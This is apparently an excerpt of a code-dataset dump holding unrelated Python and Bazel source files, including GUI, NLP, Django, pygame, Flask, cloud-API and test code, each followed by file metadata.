NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n NSStr('Hide ' + name), get_selector('hide:'), NSStr('h'))\n appMenu.addItem_(hideItem)\n\n otherItem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n NSStr('Hide Others'), get_selector('hideOtherApplications:'), NSStr('h'))\n otherItem.setKeyEquivalentModifierMask_(NSAlternateKeyMask) # Alt-Cmd-H\n appMenu.addItem_(otherItem)\n\n showItem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n NSStr('Show All'), get_selector('unhideAllApplications:'), NSStr(''))\n appMenu.addItem_(showItem)\n\n appMenu.addItem_(NSMenuItem.separatorItem())\n\n quitItem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n NSStr('Quit ' + name), get_selector('terminate:'), NSStr('q'))\n appMenu.addItem_(quitItem)\n\n appMenuItem.setSubmenu_(appMenu)\n\n if app:\n app.setMainMenu_(menubar)\n return menubar\n\n\ndef create_autorelease_pool():\n pool = 
NSAutoreleasePool.alloc().init()\n return pool\n\n\ndef application(name='Menu'):\n app = NSApplication.sharedApplication()\n create_autorelease_pool()\n create_window(title=name + ' - Type ⌘Q or select Quit from the Python menu')\n create_menu(name=name, app=app)\n return app\n\n\nif __name__ == '__main__':\n\n import sys\n\n app = application()\n if len(sys.argv) > 1:\n terminating(app, sys.argv.pop(1))\n app.run() # never returns\n\n# MIT License \n#\n# Copyright (C) 2017-2023 -- mrJean1 at Gmail -- All Rights Reserved.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR\n# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,\n# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n# OTHER DEALINGS IN THE SOFTWARE.\n","sub_path":"test/simple_menu.py","file_name":"simple_menu.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"631874317","text":"import random\r\nimport pandas as pd\r\nimport re\r\nimport jieba\r\nfrom collections import Counter\r\nfrom functools import reduce\r\nfrom operator import add, mul\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport random\r\n\r\n#A \"movie comment\" language can be defined as\r\ncommenter = \"\"\"\r\nsentence = noun_phrase verb_phrase \r\nnoun_phrase = noun \r\nnoun = 这部电影 | 剧情 |故事\r\nverb_phrase = verb adj_phrase\r\nverb = 是 | 感觉 | 演的 \r\nadj_phrase = adj\r\nadj = 最好看 | 好看 | 不好看 |可以 |喜欢 | 很好看\r\n\r\n\"\"\"\r\n# create the rule of grammer of \"movie reviewer\" language\r\ndef create_grammar(grammar_str, split='=>', line_split='\\n'):\r\n grammar = {}\r\n for line in grammar_str.split(line_split):\r\n if not line.strip(): continue\r\n exp, stmt = line.split(split)\r\n grammar[exp.strip()] = [s.split() for s in stmt.split('|')]\r\n return grammar\r\n\r\nchoice = random.choice\r\n# randomly create a sentence based on rule given in the specific grammer\r\ndef generate(gram, target):\r\n if target not in gram: return target # means target is a terminal expression\r\n expaned = [generate(gram, t) for t in choice(gram[target])]\r\n return ' '.join([e if e != '/n' else '\\n' for e in expaned if e != 'null'])\r\n\r\nfilename = 'C:/Users/38079/OneDrive/桌面/NLP/Assignment/l1/movie_comments.csv'\r\ncontent = pd.read_csv(filename, encoding='UTF-8', low_memory=False)\r\n# print(content.head())\r\narticles = content['comment'].tolist()\r\n# print((articles[0]))\r\n\r\n#Remove special characters such as line breaks: use regular matching to directly extract words\r\ndef token(string):\r\n return re.findall('\\w+', string)\r\n\r\n# print(token(articles[1]))\r\n# 
print(list(jieba.cut(articles[110])))\r\n# with_jieba_cut = Counter(jieba.cut(articles[110]))\r\n# print(with_jieba_cut.most_common()[:10])\r\n# print(''.join(token(articles[110])))\r\n\r\n#Cleaning text\r\narticles_clean = [''.join(token(str(a)))for a in articles]\r\n# print(len(articles_clean))\r\n# print((articles_clean[1]))\r\n\r\n# Write plain text to txt\r\nwith open('article.txt', 'w', encoding='utf-8') as f:\r\n for a in articles_clean:\r\n f.write(a + '\\n')\r\n\r\n#Word segmentation\r\ndef cut(string): return list(jieba.cut(string))\r\nTOKEN = []\r\nfor i, line in enumerate((open('article.txt',encoding='utf-8'))):\r\n if i % 10000 == 0: print(i)\r\n if i > 20000: break \r\n TOKEN += cut(line)\r\n\r\nwords_count = Counter(TOKEN)# Do statistics\r\n#print(words_count.most_common(100))\r\nfrequiences = [f for w, f in words_count.most_common(100)]\r\nx = [i for i in range(100)]\r\n\r\n#Visualization (Plot the vocabulary frequency of the top 100 statistical results)\r\nfig = plt.figure()\r\nax1 = fig.add_subplot(2,1,1) # 画2行1列个图形的第1个\r\nax2 = fig.add_subplot(2,1,2) # 画2行1列个图形的第2个\r\nax1.plot(x, frequiences)\r\n# print(plt.plot(x, np.log(frequiences)))\r\nax2.plot(x, np.log(frequiences))\r\nplt.show()\r\n\r\n# Probability of occurrence of a single word\r\n# def prob_1(word):\r\n# return words_count[word] / len(TOKEN)\r\n# print(prob_1('我们'))\r\nTOKEN[:10]\r\nTOKEN = [str(t) for t in TOKEN]\r\nTOKEN_2_GRAM = [''.join(TOKEN[i:i+2]) for i in range(len(TOKEN[:-2]))]\r\n# Concatenate adjacent words and store them in a list\r\nTOKEN_2_GRAM[:10]\r\nwords_count_2 = Counter(TOKEN_2_GRAM)\r\n\r\n# Probability of two consecutive words appearing\r\ndef prob_2(word1, word2):\r\n if word1 + word2 in words_count_2: return words_count_2[word1+word2] / len(TOKEN_2_GRAM)#pr(w1|w2)=pr(w1w2)/pr(w2)\r\n else:#out of vocabulary problem\r\n return 1 / len(TOKEN_2_GRAM)\r\n# print(prob_2('我们', '在'))\r\n\r\n# Get sentence probability\r\ndef get_probablity(sentence):\r\n words = cut(sentence)\r\n sentence_pro = 1\r\n for i, word in enumerate(words[:-1]):\r\n next_ = words[i+1]\r\n probability = prob_2(word, next_)\r\n sentence_pro *= probability\r\n return sentence_pro\r\n\r\n# Generate the most reasonable sentence\r\ndef generate_best(grammer):\r\n sentences=[]\r\n for sen in [generate(gram=grammer, target='sentence') for i in range(10)]:\r\n sentence=()\r\n sentence= (sen, get_probablity(sen))\r\n sentences.append(sentence)\r\n sentences=sorted(sentences, key=lambda x: x[1], reverse=True)\r\n print(sentences[0])\r\n\r\ngenerate_best(create_grammar(commenter, split='='))","sub_path":"Lab1/LanguageModel.py","file_name":"LanguageModel.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"259808208","text":"\"\"\"\n\nThis module contains the urls for projects app. 
In future, add any Url related to projects app here.\n\n\"\"\"\nfrom django.conf.urls import url\nfrom projects import views\n\nurlpatterns = [\n url(r'^user_dashboard$', views.project_member_view, name='user_dashboard'),\n url(r'^admin$', views.admin_projects_view, name='admin_projects'),\n url(r'^admin/user_mgmt$', views.user_mgmt, name='user_mgmt'),\n # Passing the project name as an argument to the view function\n url(r'^admin/(\\w+)$', views.admin_projects_edit_view, name='admin_projects_edit'),\n url(r'^admin/(\\w+)/info$', views.admin_projects_info_view, name='admin_projects_info'),\n url(r'^admin/(\\w+)/project_activity$', views.admin_projects_activity, name='admin_project_activity'),\n url(r'^admin/(\\w+)/edit_info$', views.admin_projects_edit_info, name='admin_projects_edit_info'),\n url(r'^admin/(\\w+)/lst_member$', views.list_project_members, name='list_project_members'),\n url(r'^admin/(\\w+)/add_member$', views.admin_projects_add_member, name='admin_projects_add_member'),\n url(r'^admin/(\\w+)/(\\w+)$', views.admin_projects_edit_member, name='admin_projects_edit_member'),\n url(r'^(\\w+)/info$', views.project_info_view, name='projects_info'),\n url(r'^\\w+/metadata$', views.project_info_view, name='projects_metadata'),\n # url(r'^\\w+/members$', views.project_view, name='projects_members'),\n\n]\n","sub_path":"projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"218732264","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# ライブラリをインポート\nimport time\nimport random\nimport boto3\n\n\ndef detect_text(image_path):\n \"\"\"\n AWSを使った画像中の文字を認識する関数\n \"\"\"\n \n # 画像認識の準備\n rekognition = boto3.client(service_name=\"rekognition\")\n with open(image_path, 'rb') as file:\n try:\n # 画像中から文字を認識\n detext_text_data = rekognition.detect_text(Image={'Bytes': file.read()})\n if len(detext_text_data[\"TextDetections\"]) != 0:\n # 認識結果から文字だけを取り出す\n text = detext_text_data[\"TextDetections\"][0][\"DetectedText\"]\n print(\"認識結果: {0}\".format(text))\n else:\n text = \"\"\n print(\"画像中に文字が検出されませんでした。\")\n except Exception as e:\n print(\"AWSが混み合っていますので、しばらくお待ちください。\")\n text = \"\"\n time.sleep(int(random.uniform(0, 5)))\n return text\n\nif __name__ == '__main__':\n # 画像のパス\n image_path = \"../img/forward.jpg\"\n # 画像中の文字を調べる\n text = detect_text(image_path)","sub_path":"AISystem2/scripts/aws_detect_text.py","file_name":"aws_detect_text.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"269822434","text":"# create a mapping of tags to integers\nfrom pandas import read_csv\n\n# create a mapping of tags to integers given the loaded mapping file\ndef create_tag_mapping(mapping_csv):\n\t# create a set of all known tags\n\tlabels = set()\n\tfor i in range(len(mapping_csv)):\n\t\t# convert spaced separated tags into an array of tags\n\t\ttags = mapping_csv['tags'][i].split(' ')\n\t\t# add tags to the set of known labels\n\t\tlabels.update(tags)\n\t# convert set of labels to a list to list\n\tlabels = list(labels)\n\t# order set alphabetically\n\tlabels.sort()\n\t# dict that maps labels to integers, and the reverse\n\tlabels_map = {labels[i]:i for i in range(len(labels))}\n\tinv_labels_map = {i:labels[i] for i in range(len(labels))}\n\treturn labels_map, inv_labels_map\n\n# load file as CSV\nfilename = 'train_v2.csv'\nmapping_csv = read_csv(filename)\n# create a 
mapping of tags to integers\nmapping, inv_mapping = create_tag_mapping(mapping_csv)\nprint(len(mapping))\nprint(mapping)","sub_path":"How_to_Deep_Learning_Computer_Vision/Mastery_Deep_Learning_Computer_Vision/code/chapter_22/03_map_tags_to_ints.py","file_name":"03_map_tags_to_ints.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"567418054","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 18 11:00:20 2019\r\n\r\n@author: Adit\r\n\"\"\"\r\n\r\n## Memotong Sinyal pada Node(Detik Ke-2)\r\n\r\nimport wfdb\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\nrecord = wfdb.rdrecord('Sinyal/101')\r\nrecord_dict = record.__dict__\r\nsinyal = record_dict['p_signal'][:,0]\r\n\r\nsinyal_satu_detik = sinyal\r\n\r\nfig,ax1 = plt.subplots(nrows=1)\r\nax1.plot(np.arange(720),signal[:720])\r\nplt.savefig('Sinyal.jpg')","sub_path":"ISYSRG BATCH 2_MRizkyAdityaUtama.py","file_name":"ISYSRG BATCH 2_MRizkyAdityaUtama.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"303478693","text":"import random\nimport itertools\nimport pygame as pg\n\nimport prepare\nimport tools\n\n\nSPRITE_SIZE = (32, 36)\n\n\nclass RPGSprite(pg.sprite.Sprite):\n \"\"\"Base class for player and AI sprites.\"\"\"\n def __init__(self, pos, speed, name, facing=\"DOWN\", *groups):\n super(RPGSprite, self).__init__(*groups)\n self.speed = speed\n self.name = name\n self.direction = facing\n self.old_direction = None \n self.direction_stack = [] \n self.redraw = True \n self.animate_timer = 0.0\n self.animate_fps = 10.0\n self.walkframes = None\n self.walkframe_dict = self.make_frame_dict(self.get_frames(name))\n self.adjust_images()\n self.rect = self.image.get_rect(center=pos)\n\n def get_frames(self, character):\n \"\"\"Get a list of all frames.\"\"\"\n sheet = prepare.GFX[character]\n all_frames = tools.split_sheet(sheet, SPRITE_SIZE, 3, 4)\n return all_frames\n\n def make_frame_dict(self, frames):\n \"\"\"Create a dictionary of animation cycles for each direction.\"\"\"\n frame_dict = {}\n for i,direct in enumerate(prepare.DIRECTIONS):\n frame_dict[direct] = itertools.cycle([frames[i][0], frames[i][2]])\n return frame_dict\n\n def adjust_images(self, now=0):\n \"\"\"Update the sprites walkframes as the sprite's direction changes.\"\"\"\n if self.direction != self.old_direction:\n self.walkframes = self.walkframe_dict[self.direction]\n self.old_direction = self.direction\n self.redraw = True\n self.make_image(now)\n\n def make_image(self, now):\n \"\"\"Update the sprite's animation as needed.\"\"\"\n if self.redraw or now-self.animate_timer > 1000/self.animate_fps:\n self.image = next(self.walkframes)\n self.animate_timer = now\n self.redraw = False\n\n def add_direction(self, direction):\n \"\"\"\n Add direction to the sprite's direction stack and change current\n direction.\n \"\"\"\n if direction in self.direction_stack:\n self.direction_stack.remove(direction)\n self.direction_stack.append(direction)\n self.direction = direction\n\n def pop_direction(self, direction):\n \"\"\"\n Remove direction from direction stack and change current direction\n to the top of the stack (if not empty).\n \"\"\"\n if direction in self.direction_stack:\n self.direction_stack.remove(direction)\n if self.direction_stack:\n self.direction = self.direction_stack[-1]\n\n def update(self, now, screen_rect):\n \"\"\"Update image and 
position of sprite.\"\"\"\n self.adjust_images(now)\n if self.direction_stack:\n direction_vector = prepare.DIRECT_DICT[self.direction]\n self.rect.x += self.speed*direction_vector[0]\n self.rect.y += self.speed*direction_vector[1]\n\n def draw(self, surface):\n \"\"\"Draw sprite to surface (not used if using group draw functions).\"\"\"\n surface.blit(self.image, self.rect)\n \n\nclass Player(RPGSprite):\n \"\"\"This class will represent the user controlled character.\"\"\"\n def __init__(self, pos, speed, name=\"warrior_m\", facing=\"DOWN\", *groups):\n super(Player, self).__init__(pos, speed, name, facing, *groups)\n\n def get_event(self, event):\n \"\"\"Handle events pertaining to player control.\"\"\"\n if event.type == pg.KEYDOWN:\n self.add_direction(event.key)\n elif event.type == pg.KEYUP:\n self.pop_direction(event.key)\n\n def update(self, now, screen_rect):\n \"\"\"Call base classes update method and clamp player to screen.\"\"\"\n super(Player, self).update(now, screen_rect)\n self.rect.clamp_ip(screen_rect)\n\n def add_direction(self, key):\n \"\"\"Remove direction from stack if corresponding key is released.\"\"\"\n if key in prepare.CONTROLS:\n super(Player, self).add_direction(prepare.CONTROLS[key])\n\n def pop_direction(self, key):\n \"\"\"Add direction to stack if corresponding key is pressed.\"\"\"\n if key in prepare.CONTROLS:\n super(Player, self).pop_direction(prepare.CONTROLS[key])\n\n\nclass AISprite(RPGSprite):\n \"\"\"A non-player controlled sprite.\"\"\"\n def __init__(self, pos, speed, name, facing, *groups):\n super(AISprite, self).__init__(pos, speed, name, facing, *groups)\n self.wait_range = (500, 2000)\n self.wait_delay = random.randint(*self.wait_range)\n self.wait_time = 0.0\n self.change_direction()\n\n def update(self, now, screen_rect):\n \"\"\"\n Choose a new direction if wait_time has expired or the sprite\n attempts to leave the screen.\n \"\"\"\n if now-self.wait_time > self.wait_delay:\n self.change_direction(now)\n super(AISprite, self).update(now, screen_rect)\n if not screen_rect.contains(self.rect):\n self.change_direction(now)\n self.rect.clamp_ip(screen_rect)\n\n def change_direction(self, now=0):\n \"\"\"\n Empty the stack and choose a new direction. 
The sprite may also\n choose not to go idle (choosing direction=None)\n \"\"\"\n self.direction_stack = []\n direction = random.choice(prepare.DIRECTIONS+(None,))\n if direction:\n super(AISprite, self).add_direction(direction)\n self.wait_delay = random.randint(*self.wait_range)\n self.wait_time = now\n","sub_path":"actors.py","file_name":"actors.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"400814048","text":"from model.emprestimo import Emprestimo\nfrom model.equipamento import Equipamento\n\nclass SolicitarEmprestimo(Emprestimo, Equipamento):\n def __init__(self, id, id_emprestimo, id_equipamento, id_usuario, dtSolicitacao, dtEmprestimo, dtDevolucao, status, nome, numeroMatricula, departamento, email, telefone, numeroEquipamento, marca, modelo, situacao):\n self.id = id\n self.id_emprestimo = id_emprestimo\n self.id_equipamento = id_equipamento\n \n Emprestimo.__init__(self, id, id_usuario, dtSolicitacao, dtEmprestimo, dtDevolucao, status, nome, numeroMatricula, departamento, email, telefone)\n Equipamento.__init__(self, id, numeroEquipamento, marca, modelo, situacao)\n \n def get_soli(self):\n return self.id, self.id_emprestimo, self.id_equipamento, self.id_usuario, self.dtSolicitacao, self.dtEmprestimo, self.dtDevolucao, self.status, self.nome, self.numeroMatricula, self.departamento, self.email, self.telefone, self.numeroEquipamento, self.marca, self.modelo, self.situacao\n #print(\"{}, {}, {}\".format(self.id, self.id_emprestimo, self.id_equipamento))\n\n def getDados(self):\n return self.id, self.id_emprestimo, self.id_equipamento, self.id_usuario, self.dtSolicitacao, self.dtEmprestimo, self.dtDevolucao, self.status, self.nome, self.numeroMatricula, self.departamento, self.email, self.telefone, self.numeroEquipamento, self.marca, self.modelo, self.situacao\n\n def __dict__(self):\n d = dict()\n d[\"id\"] = self.id\n d[\"id_emprestimo\"] = self.id_emprestimo\n d[\"id_equipamento\"] = self.id_equipamento\n d[\"id_usuario\"] = self.id_usuario\n d[\"dtSolicitacao\"] = self.dtSolicitacao\n d[\"dtEmprestimo\"] = self.dtEmprestimo\n d[\"dtDevolucao\"] = self.dtDevolucao\n d[\"status\"] = self.status\n d[\"nome\"] = self.nome\n d[\"numeroMatricula\"] = self.numeroMatricula\n d[\"departamento\"] = self.departamento\n d[\"email\"] = self.email\n d[\"telefone\"] = self.telefone\n d[\"numeroEquipamento\"] = self.numeroEquipamento\n d[\"marca\"] = self.marca\n d[\"modelo\"] = self.modelo\n d[\"situacao\"] = self.situacao \n return d\n\n @staticmethod\n def criar(dados):\n try:\n id = dados[\"id\"]\n id_emprestimo = dados[\"id_emprestimo\"]\n id_equipamento = dados[\"id_equipamento\"]\n id_usuario = dados[\"id_usuario\"]\n dtSolicitacao = dados[\"dtSolicitacao\"]\n dtEmprestimo = dados[\"dtEmprestimo\"]\n dtDevolucao = dados[\"dtDevolucao\"]\n status = dados[\"status\"]\n nome = dados[\"nome\"]\n numeroMatricula = dados[\"numeroMatricula\"]\n departamento = dados[\"departamento\"]\n email = dados[\"email\"]\n telefone = dados[\"telefone\"]\n numeroEquipamento = dados[\"numeroEquipamento\"]\n marca= dados[\"marca\"]\n modelo = dados[\"modelo\"]\n situacao = dados[\"situacao\"]\n return SolicitarEmprestimo(id=id, id_emprestimo=id_emprestimo, id_equipamento=id_equipamento, id_usuario=id_usuario, dtSolicitacao=dtSolicitacao, dtEmprestimo=dtEmprestimo, dtDevolucao=dtDevolucao, status=status, nome=nome, numeroMatricula=numeroMatricula, departamento=departamento, email=email, telefone=telefone, 
numeroEquipamento=numeroEquipamento, marca=marca, modelo=modelo, situacao=situacao)\n except Exception as e:\n print(\"Problema ao criar nova solicitação!\")\n print(e)","sub_path":"model/solicitarEmprestimo.py","file_name":"solicitarEmprestimo.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"589801713","text":"# -*- coding:utf-8 -*-\n\n\nfrom flask import (\n g,\n Flask,\n request\n)\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom poseidon.utils.token import TokenManager\nfrom poseidon.utils.sku import SkuManager\nfrom poseidon.settings import (\n MYSQL_CONFIG,\n REDIS_CONFIG,\n REDIS_TOKEN_EXPIRE,\n INIT_SKU\n)\n\napp = Flask(__name__)\n\n# sqlalchemy\napp.config['SQLALCHEMY_DATABASE_URI'] =\\\n 'mysql+pymysql://{username}:{password}@{host}:{port}/{database}'.format(\n **MYSQL_CONFIG)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['SQLALCHEMY_POOL_RECYCLE'] = 1200\napp.config['SQLALCHEMY_POOL_SIZE'] = 10\napp.config['SQLALCHEMY_MAX_OVERFLOW'] = -1\ndb = SQLAlchemy(app)\n\n# redis token\ntoken_manager = TokenManager(REDIS_CONFIG, REDIS_TOKEN_EXPIRE)\n# redis sku\nsku_manager = SkuManager(INIT_SKU, REDIS_CONFIG)\n\n# from restful_doc import auto_doc\nfrom poseidon import api\n# api.api_init = auto_doc(app, True, 'docs/api_doc.md',\n# 'markdown')(api.api_init) #noqa\napp = api.api_init(app)\n\n# add ping\napp.route('/ping')(lambda: 'PONG')\n\n\n@app.before_request\ndef before_hook():\n token = request.headers.get('x-token')\n user_id = token_manager.get_user(token)\n if user_id:\n g.user_id = user_id\n","sub_path":"poseidon/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"275207475","text":"def load_text_file(file_path):\n\t\"\"\"Summary\n\tLoad text file by lines\n\tArgs:\n\t file_path (String): \n\t\n\tReturns:\n\t list [String]: \n\t\"\"\"\n\twith open(file_path) as f:\n\t\tcontent = f.readlines()\n\tcontent = [x.strip() for x in content]\n\treturn content\n\n\n# file_path = \"../data/xiye_test_1/Orderline_id.dat\" \n# xd = load_text_file(file_path)\n# print(len(xd))\n\n# new_path = \"../data/xiye_test_1/Orderline_v.dat\" \n# with open(new_path, 'a') as f:\n# \tfor i in range(len(xd)):\n# \t\tf.write(str(i) + \"\\n\")\n# f.close()\n\n\n# a_list = [0, 1, 2, 3]\n# print(a_list.index(4))\n\n# import pickle\n\n# with open('asin_v', 'rb') as file:\n# \tasin = pickle.load(file)\n# with open('Orderline_v', 'rb') as file:\n# \tOrderline = pickle.load(file)\n# with open('Orderline_asin_table', 'rb') as file:\n# \tOrderline_asin_table = pickle.load(file)\n\n# for i in range(10):\n# \tprint(Orderline[i])\n\n# for i in range(10):\n# \tprint(asin[i])\n\n# for i in range(len(Orderline_asin_table)):\n# \tprint(Orderline_asin_table[i])\n\nprint(3 == None)\nprint(None == None)","sub_path":"src/tmp/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"523108934","text":"from .api import search\nimport sys\nimport json\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print(\"Search term needed!\")\n print(\"Usage: python -m duckduckgo_images_api TERM count(optional)\")\n else:\n count = 40\n if (len(sys.argv) > 2):\n count = int(sys.argv[2])\n print(json.dumps(search(sys.argv[1], 
count)))","sub_path":"duckduckgo_images_api/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"282783314","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright 1999-2017 Alibaba Group Holding Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom collections import namedtuple\n\nfrom odps.config import options\nfrom odps.tests.core import TestBase, tn\nfrom odps.compat import unittest\nfrom odps.ipython.magics import ODPSSql\n\ntry:\n import IPython\n has_ipython = True\nexcept ImportError:\n has_ipython = False\n\n\nclass Test(TestBase):\n def setUp(self):\n super(Test, self).setUp()\n self.old_use_instance_tunnel = options.tunnel.use_instance_tunnel\n\n def tearDown(self):\n super(Test, self).tearDown()\n options.tunnel.use_instance_tunnel = self.old_use_instance_tunnel\n\n @unittest.skipIf(not has_ipython, 'Skipped when no IPython is detected.')\n def testExecuteSql(self):\n FakeShell = namedtuple('FakeShell', 'user_ns')\n\n magic_class = ODPSSql(FakeShell(user_ns={}))\n magic_class._odps = self.odps\n\n test_table_name = tn('pyodps_t_test_sql_magic')\n test_content = [['line1'], ['line2']]\n self.odps.delete_table(test_table_name, if_exists=True)\n self.odps.create_table(test_table_name, 'col string', lifecycle=1)\n self.odps.write_table(test_table_name, test_content)\n\n options.tunnel.use_instance_tunnel = False\n result = magic_class.execute('select * from %s' % test_table_name)\n self.assertListEqual(self._get_result(result), test_content)\n\n options.tunnel.use_instance_tunnel = True\n result = magic_class.execute('select * from %s' % test_table_name)\n self.assertListEqual(self._get_result(result), test_content)\n\n result = magic_class.execute('show tables')\n self.assertTrue(len(result) > 0)\n\n table_name = tn('pyodps_test_magics_create_table_result')\n magic_class.execute('create table %s (col string) lifecycle 1' % table_name)\n magic_class.execute('drop table %s' % table_name)\n","sub_path":"odps/ipython/tests/test_magics.py","file_name":"test_magics.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"178647401","text":"load(\"@npm//solc:index.bzl\", _solc_5 = \"solcjs\")\nload(\"@npm//solc4:index.bzl\", _solc_4 = \"solcjs\")\nload(\"@bazel_skylib//lib:paths.bzl\", \"paths\")\n\ndef solc_contract(name, solc = _solc_5):\n src = name + \".sol\"\n baseFolder = \"decentraland/c2-data/contracts/\" + name\n folder = baseFolder + \"/\"\n file_prefix = folder.replace(\"/\", \"_\")\n internal_output = \"_internal_{}\".format(name)\n temp_bin = \"{0}_sol_{0}.bin\".format(name)\n temp_abi = \"{0}_sol_{0}.abi\".format(name)\n solc(\n name = internal_output,\n data = [\":\" + src],\n outs = [\n file_prefix + temp_abi,\n file_prefix + temp_bin,\n ],\n args = [folder + src, \"--bin\", \"--abi\", \"-o\", \"$(RULEDIR)\"],\n )\n abi_rulename = 
\"{}_abi\".format(name)\n final_abi = \"{}.abi\".format(name)\n abi_command = \"mv {} {}\".format(\"$(RULEDIR)/\" + file_prefix + temp_abi, \"$(RULEDIR)/\" + final_abi)\n native.genrule(\n name = abi_rulename,\n srcs = [\":\" + file_prefix + temp_abi],\n outs = [final_abi],\n tools = [\"@npm//solc\"],\n cmd = abi_command,\n )\n bin_rulename = \"{}_bin\".format(name)\n final_bin = \"{}.bin\".format(name)\n bin_command = \"mv {} {}\".format(\"$(RULEDIR)/\" + file_prefix + temp_bin, \"$(RULEDIR)/\" + final_bin)\n native.genrule(\n name = bin_rulename,\n srcs = [\":\" + file_prefix + temp_bin],\n outs = [final_bin],\n tools = [\"@npm//solc\"],\n cmd = bin_command,\n )\n","sub_path":"decentraland/c2-data/contracts/solc_contract.bzl","file_name":"solc_contract.bzl","file_ext":"bzl","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"291000238","text":"'''\nChecks if the function is a function\n'''\ndef isFunction(A, B, f):\n fun = True\n for x in A:\n count = 0\n if fun == True:\n for i in range(len(A)):\n if x == f[i][0]:\n count += 1\n if count > 1:\n fun = False\n break\n elif fun == False:\n break\n print(fun)\n\n'''\nPrints out the Domain's Range\n'''\ndef image(f):\n image = []\n for i in range(len(f)):\n if f[i][1] not in image:\n image.append(f[i][1])\n\n image = sorted(image)\n print(image)\n\n'''\nChecks if the function is One to One\n'''\ndef isOneToOne(A, B, f):\n oneToOne = True\n if len(A) > len(B):\n oneToOne = False\n elif len(B) >= len(A):\n for x in B:\n count = 0\n if oneToOne == True:\n for i in range(len(B)):\n if x == f[i][1]:\n count += 1\n if count > 1:\n oneToOne = False\n break\n elif oneToOne == False:\n break\n print(oneToOne)\n\n'''\nChecks if the function is Onto\n'''\ndef isOnto(A, B, f):\n onto = True\n if len(B) > len(A):\n onto = False\n elif len(A) >= len(B):\n for x in A:\n count = 0\n if onto == True:\n for i in range(len(A)):\n if x == f[i][0]:\n count += 1\n if count > 1:\n onto = False\n break\n elif onto == False:\n break\n print(onto)\n\n'''\nGives you the inverse of the function\n'''\ndef inverse(A, B, f):\n #Checks if the functionis an One to One function\n oneToOne = True\n if len(A) > len(B):\n oneToOne = False\n elif len(B) >= len(A):\n for x in B:\n count = 0\n if oneToOne == True:\n for i in range(len(B)):\n if x == f[i][1]:\n count += 1\n if count > 1:\n oneToOne = False\n break\n elif oneToOne == False:\n break\n\n #Checks if the function is an onto function\n onto = True\n if len(B) > len(A):\n onto = False\n elif len(A) >= len(B):\n for x in A:\n count = 0\n if onto == True:\n for i in range(len(A)):\n if x == f[i][0]:\n count += 1\n if count > 1:\n onto = False\n break\n elif onto == False:\n break\n\n #Reverses the list\n if (oneToOne == True) and (onto == True):\n inverse = []\n for i in range(len(f)):\n inverse.append(f[i][::-1])\n print(inverse)\n else:\n print(\"None\")\n\nA = [1, 2, 3]\nB = [4, 